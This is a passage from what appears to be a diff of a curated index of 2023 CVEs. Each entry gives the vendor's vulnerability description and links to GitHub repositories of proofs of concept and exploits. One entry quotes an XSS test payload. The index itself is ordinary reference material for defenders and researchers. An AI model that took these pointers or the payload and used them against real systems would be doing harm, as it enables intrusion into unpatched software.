unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch. + + +- [Cappricio-Securities/CVE-2023-4568](https://github.com/Cappricio-Securities/CVE-2023-4568) + +### CVE-2023-4590 (2023-11-27) + +Buffer overflow vulnerability in Frhed hex editor, affecting version 1.6.0. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument through the Structured Exception Handler (SEH) registers. + + +- [dgndrn/CVE-2023-4590](https://github.com/dgndrn/CVE-2023-4590) + +### CVE-2023-4596 (2023-08-30) + +The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + + +- [E1A/CVE-2023-4596](https://github.com/E1A/CVE-2023-4596) +- [X-Projetion/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version](https://github.com/X-Projetion/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version) +- [X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker](https://github.com/X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker) + +### CVE-2023-4622 (2023-09-06) + +A use-after-free vulnerability in the Linux kernel's af_unix component can be exploited to achieve local privilege escalation.\n\nThe unix_stream_sendpage() function tries to add data to the last skb in the peer's recv queue without locking the queue. Thus there is a race where unix_stream_sendpage() could access an skb locklessly that is being released by garbage collection, resulting in use-after-free.\n\nWe recommend upgrading past commit 790c2f9d15b594350ae9bca7b236f2b1859de02c.\n\n + + +- [0range1337/CVE-CVE-2023-4622](https://github.com/0range1337/CVE-CVE-2023-4622) + +### CVE-2023-4631 (2023-09-25) + +The DoLogin Security WordPress plugin before 3.7 uses headers such as the X-Forwarded-For to retrieve the IP address of the request, which could lead to IP spoofing. + + +- [b0marek/CVE-2023-4631](https://github.com/b0marek/CVE-2023-4631) + +### CVE-2023-4634 (2023-09-06) + +The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09. This is due to insufficient controls on file paths being supplied to the 'mla_stream_file' parameter from the ~/includes/mla-stream-image.php file, where images are processed via Imagick(). This makes it possible for unauthenticated attackers to supply files via FTP that will make directory lists, local file inclusion, and remote code execution possible. + + +- [Patrowl/CVE-2023-4634](https://github.com/Patrowl/CVE-2023-4634) + +### CVE-2023-4636 (2023-09-05) + +The WordPress File Sharing Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + + +- [ThatNotEasy/CVE-2023-4636](https://github.com/ThatNotEasy/CVE-2023-4636) + +### CVE-2023-4683 (2023-08-31) + +NULL Pointer Dereference in GitHub repository gpac/gpac prior to 2.3-DEV. + + +- [Songg45/CVE-2023-4683-Test](https://github.com/Songg45/CVE-2023-4683-Test) + +### CVE-2023-4696 (2023-09-01) + +Improper Access Control in GitHub repository usememos/memos prior to 0.13.2. + + +- [mnqazi/CVE-2023-4696](https://github.com/mnqazi/CVE-2023-4696) + +### CVE-2023-4698 (2023-09-01) + +Improper Input Validation in GitHub repository usememos/memos prior to 0.13.2. + + +- [mnqazi/CVE-2023-4698](https://github.com/mnqazi/CVE-2023-4698) + +### CVE-2023-4699 (2023-11-06) + +Missing Authentication for Critical Function vulnerability in Mitsubishi Electric Corporation MELSEC-F Series CPU modules, MELSEC iQ-F Series, MELSEC iQ-R series CPU modules, MELSEC iQ-R series, MELSEC iQ-L series, MELSEC Q series, MELSEC-L series, Mitsubishi Electric CNC M800V/M80V series, Mitsubishi Electric CNC M800/M80/E80 series and Mitsubishi Electric CNC M700V/M70V/E70 series allows a remote unauthenticated attacker to execute arbitrary commands by sending specific packets to the affected products. This could lead to disclose or tamper with information by reading or writing control programs, or cause a denial-of-service (DoS) condition on the products by resetting the memory contents of the products to factory settings or resetting the products remotely. + + +- [Scottzxor/Citrix-Bleed-Buffer-Overread-Demo](https://github.com/Scottzxor/Citrix-Bleed-Buffer-Overread-Demo) + +### CVE-2023-4741 (2023-09-03) + +In IBOS OA 4.5.5 wurde eine kritische Schwachstelle gefunden. Es geht um eine nicht näher bekannte Funktion der Datei ?r=diary/default/del der Komponente Delete Logs Handler. Durch das Manipulieren mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [wudidike/CVE-2023-4741](https://github.com/wudidike/CVE-2023-4741) + +### CVE-2023-4762 (2023-09-05) + +Type Confusion in V8 in Google Chrome prior to 116.0.5845.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) + + +- [buptsb/CVE-2023-4762](https://github.com/buptsb/CVE-2023-4762) +- [sherlocksecurity/CVE-2023-4762-Code-Review](https://github.com/sherlocksecurity/CVE-2023-4762-Code-Review) + +### CVE-2023-4771 (2023-11-16) + +A Cross-Site scripting vulnerability has been found in CKSource CKEditor affecting versions 4.15.1 and earlier. An attacker could send malicious javascript code through the /ckeditor/samples/old/ajax.html file and retrieve an authorized user's information. + + +- [sahar042/CVE-2023-4771](https://github.com/sahar042/CVE-2023-4771) + +### CVE-2023-4800 (2023-10-16) + +The DoLogin Security WordPress plugin before 3.7.1 does not restrict the access of a widget that shows the IPs of failed logins to low privileged users. + + +- [b0marek/CVE-2023-4800](https://github.com/b0marek/CVE-2023-4800) + +### CVE-2023-4813 (2023-09-12) + +A flaw was found in glibc. In an uncommon situation, the gaih_inet function may use memory that has been freed, resulting in an application crash. This issue is only exploitable when the getaddrinfo function is called and the hosts database in /etc/nsswitch.conf is configured with SUCCESS=continue or SUCCESS=merge. + + +- [tnishiox/cve-2023-4813](https://github.com/tnishiox/cve-2023-4813) + +### CVE-2023-4863 (2023-09-12) + +Heap buffer overflow in libwebp in Google Chrome prior to 116.0.5845.187 and libwebp 1.3.2 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: Critical) + + +- [mistymntncop/CVE-2023-4863](https://github.com/mistymntncop/CVE-2023-4863) +- [bbaranoff/CVE-2023-4863](https://github.com/bbaranoff/CVE-2023-4863) +- [talbeerysec/BAD-WEBP-CVE-2023-4863](https://github.com/talbeerysec/BAD-WEBP-CVE-2023-4863) +- [OITApps/Find-VulnerableElectronVersion](https://github.com/OITApps/Find-VulnerableElectronVersion) +- [GTGalaxi/ElectronVulnerableVersion](https://github.com/GTGalaxi/ElectronVulnerableVersion) +- [murphysecurity/libwebp-checker](https://github.com/murphysecurity/libwebp-checker) +- [huiwen-yayaya/CVE-2023-4863](https://github.com/huiwen-yayaya/CVE-2023-4863) +- [LiveOverflow/webp-CVE-2023-4863](https://github.com/LiveOverflow/webp-CVE-2023-4863) +- [caoweiquan322/NotEnough](https://github.com/caoweiquan322/NotEnough) +- [CrackerCat/CVE-2023-4863-](https://github.com/CrackerCat/CVE-2023-4863-) +- [sarsaeroth/CVE-2023-4863-POC](https://github.com/sarsaeroth/CVE-2023-4863-POC) + +### CVE-2023-4911 (2023-10-03) + +A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges. + + +- [Green-Avocado/CVE-2023-4911](https://github.com/Green-Avocado/CVE-2023-4911) +- [leesh3288/CVE-2023-4911](https://github.com/leesh3288/CVE-2023-4911) +- [RickdeJager/CVE-2023-4911](https://github.com/RickdeJager/CVE-2023-4911) +- [xiaoQ1z/CVE-2023-4911](https://github.com/xiaoQ1z/CVE-2023-4911) +- [silent6trinity/looney-tuneables](https://github.com/silent6trinity/looney-tuneables) +- [hadrian3689/looney-tunables-CVE-2023-4911](https://github.com/hadrian3689/looney-tunables-CVE-2023-4911) +- [ruycr4ft/CVE-2023-4911](https://github.com/ruycr4ft/CVE-2023-4911) +- [guffre/CVE-2023-4911](https://github.com/guffre/CVE-2023-4911) +- [chaudharyarjun/LooneyPwner](https://github.com/chaudharyarjun/LooneyPwner) +- [KernelKrise/CVE-2023-4911](https://github.com/KernelKrise/CVE-2023-4911) +- [Diego-AltF4/CVE-2023-4911](https://github.com/Diego-AltF4/CVE-2023-4911) +- [teraGL/looneyCVE](https://github.com/teraGL/looneyCVE) +- [snurkeburk/Looney-Tunables](https://github.com/snurkeburk/Looney-Tunables) +- [puckiestyle/CVE-2023-4911](https://github.com/puckiestyle/CVE-2023-4911) +- [yanfernandess/Looney-Tunables-CVE-2023-4911](https://github.com/yanfernandess/Looney-Tunables-CVE-2023-4911) +- [NishanthAnand21/CVE-2023-4911-PoC](https://github.com/NishanthAnand21/CVE-2023-4911-PoC) + +### CVE-2023-4966 (2023-10-10) + +Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA  virtual server. \n\n\n\n + + +- [Chocapikk/CVE-2023-4966](https://github.com/Chocapikk/CVE-2023-4966) +- [dinosn/citrix_cve-2023-4966](https://github.com/dinosn/citrix_cve-2023-4966) +- [senpaisamp/Netscaler-CVE-2023-4966-POC](https://github.com/senpaisamp/Netscaler-CVE-2023-4966-POC) +- [mlynchcogent/CVE-2023-4966-POC](https://github.com/mlynchcogent/CVE-2023-4966-POC) +- [IceBreakerCode/CVE-2023-4966](https://github.com/IceBreakerCode/CVE-2023-4966) +- [0xKayala/CVE-2023-4966](https://github.com/0xKayala/CVE-2023-4966) +- [certat/citrix-logchecker](https://github.com/certat/citrix-logchecker) +- [RevoltSecurities/CVE-2023-4966](https://github.com/RevoltSecurities/CVE-2023-4966) +- [s-bt/CVE-2023-4966](https://github.com/s-bt/CVE-2023-4966) +- [byte4RR4Y/CVE-2023-4966](https://github.com/byte4RR4Y/CVE-2023-4966) +- [jmussmann/cve-2023-4966-iocs](https://github.com/jmussmann/cve-2023-4966-iocs) +- [morganwdavis/overread](https://github.com/morganwdavis/overread) +- [LucasOneZ/CVE-2023-4966](https://github.com/LucasOneZ/CVE-2023-4966) +- [akshthejo/CVE-2023-4966-exploit](https://github.com/akshthejo/CVE-2023-4966-exploit) + +### CVE-2023-5024 (2023-09-17) + +Es wurde eine Schwachstelle in Planno 23.04.04 ausgemacht. Sie wurde als problematisch eingestuft. Es betrifft eine unbekannte Funktion der Komponente Comment Handler. Durch Beeinflussen mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [PH03N1XSP/CVE-2023-5024](https://github.com/PH03N1XSP/CVE-2023-5024) + +### CVE-2023-5043 (2023-10-25) + +Ingress nginx annotation injection causes arbitrary command execution.\n + + +- [r0binak/CVE-2023-5043](https://github.com/r0binak/CVE-2023-5043) + +### CVE-2023-5044 (2023-10-25) + +Code injection via nginx.ingress.kubernetes.io/permanent-redirect annotation.\n + + +- [r0binak/CVE-2023-5044](https://github.com/r0binak/CVE-2023-5044) +- [4ARMED/cve-2023-5044](https://github.com/4ARMED/cve-2023-5044) +- [KubernetesBachelor/CVE-2023-5044](https://github.com/KubernetesBachelor/CVE-2023-5044) + +### CVE-2023-5070 (2023-10-20) + +The Social Media Share Buttons & Social Sharing Icons plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.8.5 via the sfsi_save_export function. This can allow subscribers to export plugin settings that include social media authentication tokens and secrets as well as app passwords. + + +- [RandomRobbieBF/CVE-2023-5070](https://github.com/RandomRobbieBF/CVE-2023-5070) + +### CVE-2023-5089 (2023-10-16) + +The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled. + + +- [Cappricio-Securities/CVE-2023-5089](https://github.com/Cappricio-Securities/CVE-2023-5089) + +### CVE-2023-5142 (2023-09-24) + +In H3C GR-1100-P, GR-1108-P, GR-1200W, GR-1800AX, GR-2200, GR-3200, GR-5200, GR-8300, ER2100n, ER2200G2, ER3200G2, ER3260G2, ER5100G2, ER5200G2 and ER6300G2 bis 20230908 wurde eine Schwachstelle entdeckt. Sie wurde als problematisch eingestuft. Dabei geht es um eine nicht genauer bekannte Funktion der Datei /userLogin.asp der Komponente Config File Handler. Durch das Beeinflussen mit unbekannten Daten kann eine path traversal-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Die Komplexität eines Angriffs ist eher hoch. Das Ausnutzen gilt als schwierig. Der Exploit steht zur öffentlichen Verfügung. + + +- [kuangxiaotu/CVE-H3C-Report](https://github.com/kuangxiaotu/CVE-H3C-Report) + +### CVE-2023-5178 (2023-11-01) + +A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation. + + +- [rockrid3r/CVE-2023-5178](https://github.com/rockrid3r/CVE-2023-5178) + +### CVE-2023-5204 (2023-10-19) + +The ChatBot plugin for WordPress is vulnerable to SQL Injection via the $strid parameter in versions up to, and including, 4.8.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [RandomRobbieBF/CVE-2023-5204](https://github.com/RandomRobbieBF/CVE-2023-5204) + +### CVE-2023-5217 (2023-09-28) + +Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) + + +- [UT-Security/cve-2023-5217-poc](https://github.com/UT-Security/cve-2023-5217-poc) +- [Trinadh465/platform_external_libvpx_v1.8.0_CVE-2023-5217](https://github.com/Trinadh465/platform_external_libvpx_v1.8.0_CVE-2023-5217) +- [Trinadh465/platform_external_libvpx_v1.4.0_CVE-2023-5217](https://github.com/Trinadh465/platform_external_libvpx_v1.4.0_CVE-2023-5217) + +### CVE-2023-5324 (2023-10-01) + +In eeroOS bis 6.16.4-11 wurde eine kritische Schwachstelle gefunden. Hierbei betrifft es unbekannten Programmcode der Komponente Ethernet Interface. Durch die Manipulation mit unbekannten Daten kann eine denial of service-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff im lokalen Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [nomis/eero-zero-length-ipv6-options-header-dos](https://github.com/nomis/eero-zero-length-ipv6-options-header-dos) + +### CVE-2023-5360 (2023-10-31) + +The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE. + + +- [sagsooz/CVE-2023-5360](https://github.com/sagsooz/CVE-2023-5360) +- [phankz/Worpress-CVE-2023-5360](https://github.com/phankz/Worpress-CVE-2023-5360) +- [nastar-id/CVE-2023-5360](https://github.com/nastar-id/CVE-2023-5360) +- [Chocapikk/CVE-2023-5360](https://github.com/Chocapikk/CVE-2023-5360) +- [tucommenceapousser/CVE-2023-5360](https://github.com/tucommenceapousser/CVE-2023-5360) +- [Jenderal92/WP-CVE-2023-5360](https://github.com/Jenderal92/WP-CVE-2023-5360) +- [Pushkarup/CVE-2023-5360](https://github.com/Pushkarup/CVE-2023-5360) + +### CVE-2023-5412 (2023-10-31) + +The Image horizontal reel scroll slideshow plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 13.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [RandomRobbieBF/CVE-2023-5412](https://github.com/RandomRobbieBF/CVE-2023-5412) + +### CVE-2023-5521 (2023-10-11) + +Incorrect Authorization in GitHub repository tiann/kernelsu prior to v0.6.9. + + +- [Ylarod/CVE-2023-5521](https://github.com/Ylarod/CVE-2023-5521) + +### CVE-2023-5538 (2023-10-18) + +The MpOperationLogs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the IP Request Headers in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [juweihuitao/MpOperationLogs](https://github.com/juweihuitao/MpOperationLogs) + +### CVE-2023-5539 (2023-11-09) + +A remote code execution risk was identified in the Lesson activity. By default this was only available to teachers and managers. + + +- [cli-ish/CVE-2023-5539](https://github.com/cli-ish/CVE-2023-5539) + +### CVE-2023-5540 (2023-11-09) + +A remote code execution risk was identified in the IMSCP activity. By default this was only available to teachers and managers. + + +- [cli-ish/CVE-2023-5540](https://github.com/cli-ish/CVE-2023-5540) + +### CVE-2023-5546 (2023-11-09) + +ID numbers displayed in the quiz grading report required additional sanitizing to prevent a stored XSS risk. + + +- [obelia01/CVE-2023-5546](https://github.com/obelia01/CVE-2023-5546) + +### CVE-2023-5561 (2023-10-16) + +WordPress does not properly restrict which user fields are searchable via the REST API, allowing unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website via an Oracle style attack + + +- [pog007/CVE-2023-5561-PoC](https://github.com/pog007/CVE-2023-5561-PoC) + +### CVE-2023-5717 (2023-10-25) + +A heap out-of-bounds write vulnerability in the Linux kernel's Linux Kernel Performance Events (perf) component can be exploited to achieve local privilege escalation.\n\nIf perf_read_group() is called while an event's sibling_list is smaller than its child's sibling_list, it can increment or write to memory locations outside of the allocated buffer.\n\nWe recommend upgrading past commit 32671e3799ca2e4590773fd0e63aaa4229e50c06.\n\n + + +- [uthrasri/CVE-2023-5717](https://github.com/uthrasri/CVE-2023-5717) + +### CVE-2023-5720 (2023-11-15) + +A flaw was found in Quarkus, where it does not properly sanitize artifacts created using the Gradle plugin, allowing certain build system information to remain. This flaw allows an attacker to access potentially sensitive information from the build system within the application. + + +- [miguelc49/CVE-2023-5720-2](https://github.com/miguelc49/CVE-2023-5720-2) +- [miguelc49/CVE-2023-5720-1](https://github.com/miguelc49/CVE-2023-5720-1) +- [miguelc49/CVE-2023-5720-3](https://github.com/miguelc49/CVE-2023-5720-3) + +### CVE-2023-5808 (2023-12-04) + +SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure, through URL manipulation. Authenticated users in a Storage administrative role are able to access HNAS configuration backup and diagnostic data, that would normally be barred to that specific administrative role. + + +- [Arszilla/CVE-2023-5808](https://github.com/Arszilla/CVE-2023-5808) + +### CVE-2023-5961 (2023-12-23) + +A Cross-Site Request Forgery (CSRF) vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. An attacker can exploit this vulnerability to trick a client into making an unintentional request to the web server, which will be treated as an authentic request. This vulnerability may lead an attacker to perform operations on behalf of the victimized user.\n\n + + +- [HadessCS/CVE-2023-5961](https://github.com/HadessCS/CVE-2023-5961) + +### CVE-2023-5965 (2023-11-30) + +An authenticated privileged attacker could upload a specially crafted zip to the EspoCRM server in version 7.2.5, via the update form, which could lead to arbitrary PHP code execution. + + +- [pedrojosenavasperez/cve-2023-5965](https://github.com/pedrojosenavasperez/cve-2023-5965) + +### CVE-2023-5966 (2023-11-30) + +An authenticated privileged attacker could upload a specially crafted zip to the EspoCRM server in version 7.2.5, via the extension deployment form, which could lead to arbitrary PHP code execution. + + +- [pedrojosenavasperez/cve-2023-5966](https://github.com/pedrojosenavasperez/cve-2023-5966) + +### CVE-2023-6000 (2024-01-01) + +The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks. + + +- [RonF98/CVE-2023-6000-POC](https://github.com/RonF98/CVE-2023-6000-POC) + +### CVE-2023-6019 (2023-11-16) + +A command injection existed in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023 + + +- [FireWolfWang/CVE-2023-6019](https://github.com/FireWolfWang/CVE-2023-6019) +- [miguelc49/CVE-2023-6019-2](https://github.com/miguelc49/CVE-2023-6019-2) +- [miguelc49/CVE-2023-6019-1](https://github.com/miguelc49/CVE-2023-6019-1) +- [miguelc49/CVE-2023-6019-3](https://github.com/miguelc49/CVE-2023-6019-3) +- [Clydeston/CVE-2023-6019](https://github.com/Clydeston/CVE-2023-6019) + +### CVE-2023-6036 (2024-02-12) + +The Web3 WordPress plugin before 3.0.0 is vulnerable to an authentication bypass due to incorrect authentication checking in the login flow in functions 'handle_auth_request' and 'hadle_login_request'. This makes it possible for non authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username. + + +- [pctripsesp/CVE-2023-6036](https://github.com/pctripsesp/CVE-2023-6036) + +### CVE-2023-6063 (2023-12-04) + +The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. + + +- [motikan2010/CVE-2023-6063-PoC](https://github.com/motikan2010/CVE-2023-6063-PoC) +- [hackersroot/CVE-2023-6063-PoC](https://github.com/hackersroot/CVE-2023-6063-PoC) +- [thesafdari/CVE-2023-6063](https://github.com/thesafdari/CVE-2023-6063) + +### CVE-2023-6241 (2024-03-04) + +Use After Free vulnerability in Arm Ltd Midgard GPU Kernel Driver, Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to exploit a software race condition to perform improper memory processing operations. If the system’s memory is carefully prepared by the user, then this in turn cause a use-after-free.This issue affects Midgard GPU Kernel Driver: from r13p0 through r32p0; Bifrost GPU Kernel Driver: from r11p0 through r25p0; Valhall GPU Kernel Driver: from r19p0 through r25p0, from r29p0 through r46p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r46p0.\n\n + + +- [s1204IT/CVE-2023-6241](https://github.com/s1204IT/CVE-2023-6241) + +### CVE-2023-6246 (2024-01-31) + +A heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when the openlog function was not called, or called with the ident argument set to NULL, and the program name (the basename of argv[0]) is bigger than 1024 bytes, resulting in an application crash or local privilege escalation. This issue affects glibc 2.36 and newer. + + +- [elpe-pinillo/CVE-2023-6246](https://github.com/elpe-pinillo/CVE-2023-6246) + +### CVE-2023-6275 (2023-11-24) + +Eine problematische Schwachstelle wurde in TOTVS Fluig Platform 1.6.x/1.7.x/1.8.0/1.8.1 ausgemacht. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei /mobileredir/openApp.jsp der Komponente mobileredir. Dank Manipulation des Arguments redirectUrl/user mit der Eingabe "><script>alert(document.domain)</script> mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 1.7.1-231128, 1.8.0-231127 and 1.8.1-231127 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [erickfernandox/CVE-2023-6275](https://github.com/erickfernandox/CVE-2023-6275) + +### CVE-2023-6289 (2023-12-18) + +The Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens. + + +- [RandomRobbieBF/CVE-2023-6289](https://github.com/RandomRobbieBF/CVE-2023-6289) + +### CVE-2023-6319 (2024-04-09) + +A command injection vulnerability exists in the getAudioMetadata method from the com.webos.service.attachedstoragemanager service on webOS version 4 through 7. A series of specially crafted requests can lead to command execution as the root user. An attacker can make authenticated requests to trigger this vulnerability.\n\n * webOS 4.9.7 - 5.30.40 running on LG43UM7000PLA \n\n * webOS 5.5.0 - 04.50.51 running on OLED55CXPUA \n\n * webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on OLED48C1PUB \n\n * webOS 7.3.1-43 (mullet-mebin) - 03.33.85 running on OLED55A23LA\n\n + + +- [illixion/root-my-webos-tv](https://github.com/illixion/root-my-webos-tv) + +### CVE-2023-6350 (2023-11-29) + +Use after free in libavif in Google Chrome prior to 119.0.6045.199 allowed a remote attacker to potentially exploit heap corruption via a crafted avif file. (Chromium security severity: High) + + +- [dywsy21/CVE-2023-6350_Reproduction](https://github.com/dywsy21/CVE-2023-6350_Reproduction) + +### CVE-2023-6421 (2024-01-01) + +The Download Manager WordPress plugin before 3.2.83 does not protect file download's passwords, leaking it upon receiving an invalid one. + + +- [RandomRobbieBF/CVE-2023-6421](https://github.com/RandomRobbieBF/CVE-2023-6421) + +### CVE-2023-6444 (2024-03-11) + +The Seriously Simple Podcasting WordPress plugin before 3.0.0 discloses the Podcast owner's email address (which by default is the admin email address) via an unauthenticated crafted request. + + +- [Wayne-Ker/CVE-2023-6444-POC](https://github.com/Wayne-Ker/CVE-2023-6444-POC) + +### CVE-2023-6538 (2023-12-11) + +SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure, through URL manipulation. Authenticated users in Storage, Server or combined Server+Storage administrative roles are able to access SMU configuration backup, that would normally be barred to those specific administrative roles. + + +- [Arszilla/CVE-2023-6538](https://github.com/Arszilla/CVE-2023-6538) + +### CVE-2023-6553 (2023-12-15) + +The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server. + + +- [Chocapikk/CVE-2023-6553](https://github.com/Chocapikk/CVE-2023-6553) +- [motikan2010/CVE-2023-6553-PoC](https://github.com/motikan2010/CVE-2023-6553-PoC) +- [kiddenta/CVE-2023-6553](https://github.com/kiddenta/CVE-2023-6553) +- [cc3305/CVE-2023-6553](https://github.com/cc3305/CVE-2023-6553) +- [Harshit-Mashru/CVE-2023-6553](https://github.com/Harshit-Mashru/CVE-2023-6553) + +### CVE-2023-6567 (2024-01-11) + +The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order_by’ parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [mimiloveexe/CVE-2023-6567-poc](https://github.com/mimiloveexe/CVE-2023-6567-poc) + +### CVE-2023-6595 (2023-12-14) + +In WhatsUp Gold versions released before 2023.1, an API endpoint was found to be missing an authentication mechanism. It is possible for an unauthenticated attacker to enumerate ancillary credential information stored within WhatsUp Gold. + + +- [sharmashreejaa/CVE-2023-6595](https://github.com/sharmashreejaa/CVE-2023-6595) + +### CVE-2023-6634 (2024-01-11) + +The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution. + + +- [krn966/CVE-2023-6634](https://github.com/krn966/CVE-2023-6634) + +### CVE-2023-6654 (2023-12-10) + +In PHPEMS 6.x/7.x/8.x/9.0 wurde eine kritische Schwachstelle entdeckt. Betroffen ist eine unbekannte Verarbeitung in der Bibliothek lib/session.cls.php der Komponente Session Data Handler. Dank der Manipulation mit unbekannten Daten kann eine deserialization-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [qfmy1024/CVE-2023-6654](https://github.com/qfmy1024/CVE-2023-6654) + +### CVE-2023-6661 +- [cli-ish/CVE-2023-6661](https://github.com/cli-ish/CVE-2023-6661) + +### CVE-2023-6663 +- [cli-ish/CVE-2023-6663](https://github.com/cli-ish/CVE-2023-6663) + +### CVE-2023-6700 (2024-02-05) + +The Cookie Information | Free GDPR Consent Solution plugin for WordPress is vulnerable to arbitrary option updates due to a missing capability check on its AJAX request handler in versions up to, and including, 2.0.22. This makes it possible for authenticated attackers, with subscriber-level access or higher, to edit arbitrary site options which can be used to create administrator accounts. + + +- [RandomRobbieBF/CVE-2023-6700](https://github.com/RandomRobbieBF/CVE-2023-6700) + +### CVE-2023-6702 (2023-12-14) + +Type confusion in V8 in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) + + +- [kaist-hacking/CVE-2023-6702](https://github.com/kaist-hacking/CVE-2023-6702) + +### CVE-2023-6710 (2023-12-12) + +A flaw was found in the mod_proxy_cluster in the Apache server. This issue may allow a malicious user to add a script in the 'alias' parameter in the URL to trigger the stored cross-site scripting (XSS) vulnerability. By adding a script on the alias parameter on the URL, it adds a new virtual host and adds the script to the cluster-manager page. + + +- [DedSec-47/Metasploit-Exploits-CVE-2023-6710](https://github.com/DedSec-47/Metasploit-Exploits-CVE-2023-6710) +- [DedSec-47/CVE-2023-6710](https://github.com/DedSec-47/CVE-2023-6710) + +### CVE-2023-6875 (2024-01-11) + +The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to 